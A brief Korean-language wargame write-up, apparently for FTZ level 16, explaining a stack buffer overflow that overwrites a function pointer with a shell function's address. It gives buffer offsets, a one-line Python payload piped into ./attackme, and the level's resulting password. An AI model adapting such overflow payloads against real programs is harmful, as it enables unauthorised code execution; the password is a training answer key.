FTZ level16

포인터 함수 안에 들어간 printit 주소 값을 shell주소로 바꿔버리도록 하자

 

buf : [ebp-56]

*call : [ebp-16]

 

payload

(python –c ‘print “\x90”*40 + “\xd0\x84\x04\x08”’; cat) | ./attackme

password : king poetic